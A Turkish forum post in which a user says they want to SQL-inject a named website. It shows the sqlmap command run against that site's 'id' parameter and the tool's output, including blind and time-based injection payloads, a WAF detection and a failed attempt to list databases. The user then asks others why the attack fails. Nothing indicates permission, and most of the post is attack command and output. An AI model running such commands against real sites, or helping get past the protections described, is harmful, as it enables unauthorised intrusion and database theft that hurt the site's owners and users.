h-ttp://www.benij.org/blog.php?id=1 site bu arkadaşlar SQL Injection yapmak istiyorum sqlmap kullanıyorum. Yazdığım kod:
sqlmap -u h-ttp://www.benij.org/blog.php?id=1 --dbs
çıktı:
sqlmap -u h-ttp://www.benij.org/blog.php?id=1 --dbs
çıktı:
Sitede SQL açığı yokmu acaba? Hatanın sebebini bilen yazabilir mi lütfen. Konuyu bir süre güncel tutacağım.[12:28:56] [INFO] resuming back-end DBMS 'mysql'
[12:28:56] [INFO] testing connection to the target URL
[12:28:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9075=9075 AND 'hEPc'='hEPc
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'jQlp'='jQlp
---
[12:28:57] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[12:28:57] [INFO] fetching database names
[12:28:57] [INFO] fetching number of databases
[12:28:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:28:57] [INFO] retrieved:
[12:28:57] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[12:28:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[12:29:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:29:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:29:08] [ERROR] unable to retrieve the number of databases
[12:29:08] [INFO] falling back to current database
[12:29:08] [INFO] fetching current database
[12:29:08] [INFO] retrieved:
[12:29:09] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[12:29:21] [CRITICAL] unable to retrieve the database names
[12:29:21] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 42 times
[*] shutting down at 12:29:21
Son düzenleme: